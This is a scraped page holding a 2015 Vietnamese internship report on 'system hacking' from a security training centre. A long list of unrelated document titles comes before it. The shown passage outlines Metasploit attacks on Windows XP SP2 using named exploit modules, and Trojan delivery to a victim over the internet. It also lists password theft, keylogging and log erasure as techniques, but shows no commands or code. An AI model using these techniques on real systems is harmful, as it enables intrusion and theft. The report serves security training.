PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢImyvh40253
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...Nguyen Thanh Tu Collection
 
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...hoangtuansinh1
 
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhkinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhdtlnnm
 
GNHH và KBHQ - giao nhận hàng hoá và khai báo hải quan
GNHH và KBHQ - giao nhận hàng hoá và khai báo hải quanGNHH và KBHQ - giao nhận hàng hoá và khai báo hải quan
GNHH và KBHQ - giao nhận hàng hoá và khai báo hải quanmyvh40253
 
Các điều kiện bảo hiểm trong bảo hiểm hàng hoá
Các điều kiện bảo hiểm trong bảo hiểm hàng hoáCác điều kiện bảo hiểm trong bảo hiểm hàng hoá
Các điều kiện bảo hiểm trong bảo hiểm hàng hoámyvh40253
 
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdfBỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdfNguyen Thanh Tu Collection
 
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docxTHAO316680
 
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...Nguyen Thanh Tu Collection
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...Nguyen Thanh Tu Collection
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng ĐồngGiới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng ĐồngYhoccongdong.com
 
Đề cương môn giải phẫu......................
Đề cương môn giải phẫu......................Đề cương môn giải phẫu......................
Đề cương môn giải phẫu......................TrnHoa46
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
Campbell _2011_ - Sinh học - Tế bào - Ref.pdf
Campbell _2011_ - Sinh học - Tế bào - Ref.pdfCampbell _2011_ - Sinh học - Tế bào - Ref.pdf
Campbell _2011_ - Sinh học - Tế bào - Ref.pdfTrnHoa46
 

Último (20)

Kiểm tra cuối học kì 1 sinh học 12 đề tham khảo
Kiểm tra cuối học kì 1 sinh học 12 đề tham khảoKiểm tra cuối học kì 1 sinh học 12 đề tham khảo
Kiểm tra cuối học kì 1 sinh học 12 đề tham khảo
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
 
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
 
sách sinh học đại cương - Textbook.pdf
sách sinh học đại cương   -   Textbook.pdfsách sinh học đại cương   -   Textbook.pdf
sách sinh học đại cương - Textbook.pdf
 
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢIPHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
 
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
 
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhkinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
 
GNHH và KBHQ - giao nhận hàng hoá và khai báo hải quan
GNHH và KBHQ - giao nhận hàng hoá và khai báo hải quanGNHH và KBHQ - giao nhận hàng hoá và khai báo hải quan
GNHH và KBHQ - giao nhận hàng hoá và khai báo hải quan
 
Các điều kiện bảo hiểm trong bảo hiểm hàng hoá
Các điều kiện bảo hiểm trong bảo hiểm hàng hoáCác điều kiện bảo hiểm trong bảo hiểm hàng hoá
Các điều kiện bảo hiểm trong bảo hiểm hàng hoá
 
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdfBỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
 
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
 
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng ĐồngGiới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
 
Đề cương môn giải phẫu......................
Đề cương môn giải phẫu......................Đề cương môn giải phẫu......................
Đề cương môn giải phẫu......................
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
Campbell _2011_ - Sinh học - Tế bào - Ref.pdf
Campbell _2011_ - Sinh học - Tế bào - Ref.pdfCampbell _2011_ - Sinh học - Tế bào - Ref.pdf
Campbell _2011_ - Sinh học - Tế bào - Ref.pdf
 

báo cáo thực tập cuối khóa Athena-system hacking- Bùi Thanh Dung

  • 1. [Type here] TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO THỰC TẬP SYSTEM HACKING Giảng viên hướng dẫn: Võ Đỗ Thắng Sinh viên thực hiện: Bùi Thanh Dung TP. Hồ Chí Minh,ngày 20 tháng 4 năm 2015
  • 2. [Type here] ĐÁNH GIÁ CỦA GIÁO VIÊN HƯỚNG DẪN ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ Tp Hồ Chí Minh, ngày … tháng … năm 2015 Giảng viên hướng dẫn Võ Đỗ Thắng
  • 3. [Type here] ĐÁNH GIÁ CỦA GIÁO VIÊN HƯỚNG DẪN ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ ........................................................................................................................................................ Tp Hồ Chí Minh, ngày … tháng … năm 2015 Giảng viên hướng dẫn
  • 4. [Type here] LỜICẢM ƠNKHOACÔNG NGHỆTHÔNG TIN TRƯỜNG ĐẠIHỌCCÔNG NGHIỆPTPHCM Em xin chân thành cảm ơn trường Đại Học Công Nghiệp TPHCM và khoa Công Nghệ Thông Tin đã tạo điềukiệncho em hoànthành tốt đợt Thực Tập này. Trong đợt thực tập này đã cho em những kinh nghiệm quý báu. Những kinh nghiệm này sẽ giúp em hoàn thiện hơn trong công việc và môi trường làm việc saunày. Mặc dù em đã cố gắng hoànthànhbáo cáo thực tậpnàyvới tất cả nổ lực của bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn khôngthể tránh khỏi những thiếusót nhất định. Em rất mong nhận được sự đóng góp, chia sẻ để em có thể làm tốt hơn nữa. Một lần nữa em xin chân thành cảm ơn.
  • 5. [Type here] LỜICẢMƠNTRUNG TÂM ATHENA Em xin cảm ơn giám đốc Trung Tâm Quản Trị Mạng và An Ninh Mạng Quốc Tế Athena, cùng các anh chị trongtrungtâm. Đặc biệt, em xin chân thành cảm ơn thầy Võ Đỗ Thắng đã nhiệt tình giúp đỡ và hướng dẫn em trong suốt thời gian thực tập. Thầy đã tạo mọi điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết cũng như đóng góp những ý kiến quý báu để hoàn thành tốt bài báo cáo này. Em cũng xin gửi lời cám ơn đến các anh chị, bạn bè đã truyền đạt kinh nghiệm và tạo điều kiện cho em hoàn thành đềtài này. Trong quá trình thực hiện đề tài không thể không có những sai sót, mong thầy cô tại trungtâm ATHENA và các bạn thẳng thắn góp ý đề em rút kinh nghiệm trongcác công trình tìm hiểu, phát triển sau này. Một lần nữa em xin chân thành cảm ơn.
  • 6. [Type here] MỤC LỤC Contents GIỚI THIỆU TRUNG TÂM .............................................................................................................2 Lịch sử hình thành.........................................................................................................................2 Lĩnh vực hoạt động........................................................................................................................2 Đội ngũ giảng viên.........................................................................................................................2 Địa chỉ liên hệ ................................................................................................................................3 MỞ ĐẦU...........................................................................................................................................4 CHƯƠNG I: GIỚI THIỆU ĐỀ TÀI..................................................................................................5 1. Tên đề tài: System hacking.......................................................................................................5 2. System hacking là gì? .............................................................................................................5 3. Môi trường thực hiện..............................................................................................................5 4. Các lỗ hỏng thường được khai thác trong hệ điều hành..........................................................5 5. Quá trình tấn công vào hệ thống.............................................................................................6 Hình 1: quá trình tấn công vào 1 hệ thống .........................................................................................7 CHƯƠNG 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN...9 1. Giới thiệu về hệ điều hành backtract 5 R3..............................................................................9 2. Giới thiệu về metasploit........................................................................................................10 2.1. Metasploit Enviroment:.................................................................................................11 2.2. Chọn module exploit:Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác. 11 2.3. Cấu hình các module exploit đã chọn............................................................................11 2.4. Verify những options vừa cấu hình...................................................................................12 2.5. Lựa chọn target.............................................................................................................12 2.6. Lựa chọn payload..........................................................................................................12 2.7. Thực thi exploit.............................................................................................................12 3. Sơ đồ tổng quan hệ thống LAN.............................................................................................12 Hình 2: Sơ đồ tổng quan hệ thống mạng LAN .................................................................................13 4. Xâm nhập và khai thác lỗ hỏng trên win sp sp2....................................................................14 Hình 3: khởi động metasploit..........................................................................................................14 4.1. Sử dụng mã lỗi ms10_090..............................................................................................15 Hình 4.1.1 bước 1 ms10_090..........................................................................................................15 Hình 4.1.2: bước 2 ms10_090........................................................................................................16 4.2. Sử dụng mã lỗi ms10_042..............................................................................................16
  • 7. [Type here] Hình 4.2.1 ms10_042 bước 1..........................................................................................................17 Hình 4.2.2 ms10_042 bước 2..........................................................................................................18 Hình 4.2.3 ms10_042 bước 3..........................................................................................................19 Hình 4.2.4 ms10_042 bước 4..........................................................................................................19 4.3. Sử dụn mã lỗi ms12_004................................................................................................20 Hình 4.3.1 ms12_004 bước 1..........................................................................................................20 Hình 4.3.2 ms12_004 bước 2..........................................................................................................21 Hình 4.3.3 ms12_004 bước 3..........................................................................................................22 Hình 4.3.4 ms12_004 bước 4..........................................................................................................23 4.4. Sử dụng mã lỗi ms12_027..............................................................................................23 Hình 4.4.1 ms12_027 bước 1..........................................................................................................24 Hình 4.4.2 ms12_027 bước 2..........................................................................................................25 Hình 4.4.3 ms12_027 bước 3..........................................................................................................26 Hình 4.4.4 ms12_027 bước 4..........................................................................................................26 Hình 4.4.5 ms12_027 bước 5..........................................................................................................27 Hình 4.4.6 ms12_027 bước 6..........................................................................................................28 Hình 4.4.6 ms12_027 bước 6a.....................................................................................................29 Hình 4.4.6 ms12_027 bước 6b ....................................................................................................29 CHƯƠNG 3: XÂY DỰNG HONEYPOT KHAI THÁC XÂMNHẬP LỖ HỔNG TỪ XA QUA MẠNG INTERNET......30 1. Máy chủ ảo VPS...................................................................................................................30 1.1. Định nghĩa.....................................................................................................................30 1.2. Đặc điểm về thông số VPS.............................................................................................30 2. Honeypot..............................................................................................................................30 3. Sơ đồ tổng quan sử dụng Honeypot xâm nhập từ xa thông qua internet...............................31 Hình 5: sơ đồ tổng quan sử dụng Honepot .......................................................................................31 Hình 6: đã cài đặt thành công metasploit trên VPS...........................................................................32 4. Tấn công trên internet...........................................................................................................32 Hình 7: gửi Trojan về máy victim.....................................................................................................33 Hình 8: khai thác thông tin từ máy victim........................................................................................34 CHƯƠNG 4: TỔNG KẾT......................................................................................................................35 TÀI LIỆU THAM KHẢO................................................................................................................36
  • 8. 2 SVTH: Bùi Thanh Dung GIỚI THIỆU TRUNG TÂM Lịch sử hình thành Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế Athena được thành lập vào năm 2004 là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng lượng, nhiệt huyết và kinh nghiệm trong lĩnh vực CNTT. Lĩnh vực hoạt động Trung tâm đã và đang tập trung đào tạo chuyên sâu quản trị mạng, an ninh mạng và thương mại điện tử theo tiêu chuẩn quốc tế như Microsoft, Cisco, Linux LPI, CEH,… song song đó trung tâm còn có các chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng dành riêng của Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh nghiệp , các cơ quan chính phủ và tổ chức tài chính,… Sau gần 10 năm hoạt động, nhiều học viên tốt nghiệp trung tâm Athena đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh cho nhiều bộ ngành như Cục Thông Tin-Bộ Quốc Phòng, sở thông tin truyền thông các tỉnh,… Ngoài chương trình đào tạo, trung tâm còn có các chương trình hợp tác và trao đổi công nghệ với các trường đại học lớn như: ĐH bách khoa tp Hồ Chí Minh, học viện bưu chính viễn thông, hiệp hội an toàn thông tin(VNISA), viện kỹ thuật quân sự,… Đội ngũ giảng viên Tất cả các giảng viên của trung tâm Athena đều tốt nghiệp từ các trường đại học hàng đầu trong nước và phải có chứng chỉ quốc tế MCSA, MCSE, CCNA, CCNP, Security+, CEH, có bằng siêu phạm quốc tế MCT(Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc đê dù điều kiện tham gia giảng dậy tại trung tâm ATHENA. Bên cạnh đó các giảng viên thường xuyên đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước phát triển tiên tiến như Mỹ, Pháp, Hà Lan,… và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA.
  • 9. 3 SVTH: Bùi Thanh Dung Địa chỉ liên hệ TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA Liênhệ: -Cơsở1: 92Nguyễn Đình Chiểu, Phường Đa Kao, Q1, TPHCM Điện thoại: - 0907879477 - 0943230099 - (08)38244041 Gần ngã tư Đinh Tiên Hoàng - Nguyễn Đình Chiểu -Cơ sở 2: 2Bis Đinh Tiên Hoàng, Phường Đa Kao, Q1, TPHCM Điện thoại: - 0943200088 - (08)22103801 Cạnh sânvận động Hoa Lư -Cách đài truyền hình Tp HTV 50mét - Website: http://athena.edu.vn - E-mail :support@athena.edu.vn tuvan@athena.edu.vn
  • 10. 4 SVTH: Bùi Thanh Dung MỞ ĐẦU Theo thống kê, từ đầu năm 2013 đến nay, tại Việt Nam đã có 2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có khoảng 300 website bị tấn công. Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu phát triển của Bkav cho biết, các cơ quan doanh nghiệp bị tấn công gần như là đầy đủ, từ ít nghiêm trọng đến nghiêm trọng và rất nghiêm trọng (nhằm đánh cắp các tài liệu mật) và các mã độcnày nhắm cả vào Bộ Công An, Bộ Quốc phòng, ngân hàng, các cơ quan đơn vị nghiên cứu, các doanh nghiệp…Đã có những chiến dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam. Trong đó, bản thân các vụ tấn công trên mạng và các vụ xâm nhập hệ thống công nghệ thông tin là nhằm do thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh và một số vụ mất an toàn thông tin số khác đang gia tăng ở mức báo động về số lượng, đa dạng về hình thức, tinh vi hơn về công nghệ. Trước tình hình đó, song song việc ban hành chỉ thị 897/CT-TTg, Thủ Tướng chỉ đạo các Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toànthông tin số. Thủ tướng Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông tin số ở nước ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng dụng công nghệ thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc phòng, an ninh. Bài báo cáo này sẽ giới thiệu tổng quát về các phương pháp mà Hacker sử dụng để tấn công xâm nhập và khai thác vào các phiển bản hệ điều hành Windows, hệ điều hành phổ biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật trong thời đại Internet ngày nay.
  • 11. 5 SVTH: Bùi Thanh Dung CHƯƠNG I: GIỚI THIỆU ĐỀ TÀI 1. Tên đề tài: System hacking 2. System hacking là gì? System System hacking bao gồm những kỹ thuật lấy username, password đựa vào phần mềm cài trênhệ thốnghoặc tính dễ cài đặt và chạy các dịchvụ từ xa của hệ điều hành Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những logfile hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện mọi thứ trênmáy tính đó, gây ranhững hậu quả vô cùng nghiêm trọngchocáccánhân, tổchức. 3. Môi trường thực hiện Môi trường thực hiện trên windows xp sp2 thông qua các lỗ hỏng đã bị phát hiện. Thực hiện trên mạng LAN và xây dựng HONEYPOT khai thác xâm nhập lỗ hỏng từ xa thông qua internet. 4. Các lỗ hỏng thường được khai thác trong hệ điều hành Như chúng ta đã biết, Windows là hệ điềuhành phổ biến và được sử dụng rộng rãi nhất trên thế giới hiện nay. Và với việc được tạo nên bằng một cấu trúc lệnh có thể nói khổng lồ như vậy thì việc sai sót lỗi sẽ là chuyện không tránh khỏi. Việc chiếm lĩnh hàng đầu của hệ điều hành này cũng là nguyên nhân khiến các hacker tìm kiếm những lổ hỏng bảo mật để tấn công nhằm kiểm soát hay đánh cắp thông tin.
  • 12. 6 SVTH: Bùi Thanh Dung Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điềuhành, các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập nhật các lỗ hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản trước. Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên bản cũ mà mình đang sử dụng nếu không các Hacker sẽ lợi dụng điều này để tấn công vào hệ thống. Thông thường, các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo mật và việc khai thác các lỗ hổng đó như thế nào thì tùy từng người. Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới của hệ điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của Microsoft. Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để truy cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các chương trình độc hại được thiết kế đặc biệt để khai thác các lỗ hổng này, được gọi là kỹ thuật exploit, đang ngày càng phổ biến nhanh chóng. Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như HĐH Windows, Internet Explorer, Windows Server, Microsoft Exchange và .NetFramework. 5. Quá trình tấn công vào hệ thống Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục tiêu phía trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, đánh sập nó, có thể được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như sau:
